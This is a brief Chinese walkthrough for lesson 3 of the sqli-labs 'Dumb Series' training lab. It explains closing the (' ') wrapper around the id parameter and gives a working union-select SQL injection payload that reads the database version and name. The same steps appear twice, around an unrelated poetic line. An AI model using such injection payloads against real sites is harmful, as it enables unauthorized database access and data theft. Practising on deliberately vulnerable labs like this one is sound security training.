SQLI DUMB SERIES-3
less3
输入?id=1'
说明输入的id旁边加了单引号和括号('id'),直接在1后面加入“ ') ”,闭合前面的单引号和括号。
方法同less1相同。
例如:查询PHP版本和数据库名字
?id=1') union select 1,version(),database() %23
由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。
less3
输入?id=1'
说明输入的id旁边加了单引号和括号('id'),直接在1后面加入“ ') ”,闭合前面的单引号和括号。
方法同less1相同。
例如:查询PHP版本和数据库名字
?id=1') union select 1,version(),database() %23
